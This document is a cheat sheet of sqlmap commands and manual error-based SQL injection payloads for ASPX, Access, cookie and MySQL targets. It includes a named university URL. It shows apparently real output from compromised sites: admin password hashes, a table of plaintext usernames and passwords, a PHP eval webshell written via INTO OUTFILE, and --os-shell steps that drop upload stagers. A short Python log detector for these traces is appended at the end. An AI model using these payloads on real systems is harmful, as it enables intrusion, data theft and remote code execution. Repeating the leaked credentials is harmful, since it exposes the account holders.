SqlMap basic injection commands
ASPX injection notes:
sqlmap -u "http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1" -v 1 -f
/******************
[02:54:48] [INFO] testing Microsoft SQL Server
[02:54:48] [INFO] confirming Microsoft SQL Server
[02:54:48] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: active fingerprint: Microsoft SQL Server 2005
[02:54:48] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
******************/
Get the current user name
sqlmap -u "http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1" --current-user
Get the current database name
sqlmap -u "http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1" --current-db
Check the current user's account (privileges)
sqlmap -u "http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1" --privileges
Run an OS command
sqlmap -u "http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1" --os-cmd="net stop policyagnet"
Run SQL commands
sqlmap -u "http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1" --sql-shell
Interactive OS shell
sqlmap -u "http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1" --os-shell
Reverse shell
sqlmap -u "http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1" --os-shell
Advanced injection
Multiple parameters: use -p to test a single parameter
sqlmap -u "http://xxx.xxx.xxx/xx.php?name=111&id=1&pid=101" -p name
1: List tables
sqlmap -u "http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1" --tables
Enumerate all databases
sqlmap -u "http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1" --dbs
2: List all table names under database XX: -D xx
sqlmap -u "http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1" -D msdb --tables
3: List the columns of a table
sqlmap -u "http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1" -D weijienewdb -T EAdmin --columns
sqlmap -u "http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1" -D weijienewdb -T EAddress --columns
Database: weijienewdb
Table: EAdmin
[8 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| AdminName     | varchar  |
| AdminPassword | varchar  |
| AdminStatus   | int      |
| ID            | int      |
| LastAccess    | datetime |
| Permission    | varchar  |
| RealName      | varchar  |
| Rem           | varchar  |
+---------------+----------+
4: Dump column contents
sqlmap -u "http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1" -D weijienewdb -T EAdmin -C AdminName --dump
Database: weijienewdb
Table: EAdmin
[3 entries]
+-----------+
| AdminName |
+-----------+
| admin     |
| hzweijie  |
| ihangjing |
+-----------+
sqlmap -u "http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1" -D weijienewdb -T EAdmin -C AdminPassword --dump
Database: weijienewdb
Table: EAdmin
[3 entries]
+----------------------------------+
| AdminPassword                    |
+----------------------------------+
| 5a3d3ff3726166cfcdafd12b128098b0 |
| a10857e51018b45c925b599222557517 |
| c7b34dc8de164efca48e088119840f98 |
+----------------------------------+
5: Dump the table
sqlmap -u "http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1" -D weijienewdb -T EAddress -C Address,Phone,Mobilephone,DataID,rim_address --dump --threads=10 --start=1 --stop=10
--start / --stop: the range of rows to dump
Columns of EAddress (output of the --columns command above):
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| Address     | varchar  |
| AddTime     | datetime |
| BuildingID  | int      |
| DataID      | int      |
| Lat         | varchar  |
| Lng         | varchar  |
| Mobilephone | varchar  |
| Phone       | varchar  |
| Pri         | int      |
| Receiver    | varchar  |
| rim_address | varchar  |
| rim_num     | int      |
| rim_parity  | int      |
| rim_type    | int      |
| Tab         | varchar  |
| UserID      | int      |
| ZoneCode    | varchar  |
| ZoneName    | varchar  |
+-------------+----------+
Access injection notes
1. sqlmap.py -u "<injection URL>"    (check whether the URL is injectable)
2. sqlmap.py -u "<injection URL>" --tables    (guess tables)
3. sqlmap.py -u "<injection URL>" --columns -T admin    (guess columns; admin is the table name)
4. sqlmap.py -u "<injection URL>" --dump -T admin -C username,password    (guess contents)
Cookie injection notes:
1. sqlmap -u "<ASP injection URL>" --cookie "id=<number>" --tables --level 2    (enumerate the database tables)
2. sqlmap -u "<ASP injection URL>" --cookie "id=<number>" --columns -T admin --level 2    (admin is the table name)
3. sqlmap -u "<ASP injection URL>" --cookie "id=<number>" --dump -T admin -C "username,password" --level 2
MySQL injection notes:
1. sqlmap -u <PHP injection URL> --dbs    (get the databases)
2. sqlmap -u <PHP injection URL> -D <database> --tables    (get the tables in the database)
3. sqlmap -u <PHP injection URL> -D <database> -T <table> --columns    (get the columns)
4. sqlmap -u <PHP injection URL> -D <database> -T <table> -C id,<column>,<column> --dump    (get the accounts and passwords)
Manual injection statements for a PHP admin login form:
'and(select 1 from(select count(*),concat((select concat(<function 1>,0x20,<function 2>,0x20,......) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
1. Extract table names
'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
2. Extract column names
'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=<table name in hex> limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=<table name in hex> limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=<table name in hex> limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
3. Extract usernames and passwords
'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
4. Write out a webshell
'or 1 AND (SELECT id FROM the_users limit 1 INTO OUTFILE 'D:/sub/jw/safe1.php' lines terminated by '<!--?php eval($_POST[safe])?-->') #
Interactive shell writing and command execution:
Note: prerequisites for writing a shell (1. must have root privileges; 2. must know the site's web root path; 3. GPC (magic_quotes_gpc) set to off)
sqlmap -u <injection URL> --current-user    (check the current user's privileges)
sqlmap -u <injection URL> --os-cmd=ipconfig    (when prompted, choose 4 for PHP, press Enter, then enter the web root path, e.g. D:/WWW/, and press Enter)
How to get a shell
sqlmap -u <injection URL> --os-shell    (when prompted, choose 4 for PHP and press Enter)
Enter the web root path, e.g. D:/WWW/, and press Enter
After it finishes, two files are generated in the web root; opening them allows uploads:
tmpuoiuz.php
tmpbxbxz.php
+------------+-----------+
| user_pwd | user_name |
+------------+-----------+
| wsadmin | admin |
| qianqian88 | pub |
| wsbee123 | 阙明毅 |
| taobao | 淘宝 |
| admin | admin |
+------------+-----------+
D:/Web/
Pseudo-static injection:
sqlmap -u http://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html --dbs
Add a "*" right after the injectable part of the URL.
The rest is the same as the MySQL injection notes above.
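As an added defender-side example (not part of the original notes): a small Python detector that scans web-server log lines for the traces left by the techniques collected on this page: the floor(rand(0)*2) double-query error-based payload, information_schema enumeration, INTO OUTFILE writes, the sqlmap User-Agent, and requests to the tmpxxxxx.php stager files that --os-shell drops into the web root. The log lines, IPs and timestamps are constructed.

```python
import re
from urllib.parse import unquote_plus

# Signatures drawn from the payloads and sqlmap behaviour shown in the notes above.
SIGNATURES = {
    "error_based_double_query": re.compile(r"floor\(\s*rand\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S),
    "schema_enumeration": re.compile(r"information_schema\.(tables|columns)", re.I),
    "file_write": re.compile(r"into\s+outfile", re.I),
    "sqlmap_user_agent": re.compile(r"sqlmap/", re.I),
    "sqlmap_stager_file": re.compile(r"/tmp[a-z]{5}\.php\b", re.I),  # e.g. the tmpuoiuz.php stager
}

# Combined log format (Apache/nginx style); we only need client IP, request path and User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def analyse_line(line):
    """Return (client_ip, [matched signature names]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode twice so that double-URL-encoded payloads are inspected in clear text as well.
    decoded = unquote_plus(unquote_plus(m.group("path")))
    haystack = decoded + " " + m.group("ua")
    return m.group("ip"), [name for name, rx in SIGNATURES.items() if rx.search(haystack)]

def analyse_log(lines):
    """Aggregate matched signatures per client IP; lines with no hits are left out of the report."""
    report = {}
    for line in lines:
        parsed = analyse_line(line)
        if parsed and parsed[1]:
            report.setdefault(parsed[0], set()).update(parsed[1])
    return report

# Constructed sample log (not real traffic): one clean request, one sqlmap probe carrying the
# double-query payload, the follow-up request to the dropped stager, and an INTO OUTFILE attempt.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /userhome/ajax/getaddressbase.aspx?cityid=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=1%27%20and(select%201%20from(select%20count(*),concat((select%20table_name%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 HTTP/1.1" 500 120 "-" "sqlmap/1.7"',
    '198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "POST /tmpuoiuz.php HTTP/1.1" 200 44 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Oct/2023:14:01:10 +0000] "GET /index.php?id=1%27%20or%201%20into%20outfile%20%27x%27%20%23 HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, hits in analyse_log(SAMPLE_LOG).items():
        print(ip, sorted(hits))
```

A single hit on sqlmap_stager_file or file_write is worth an alert on its own; the other signatures are best correlated per source IP, as analyse_log does.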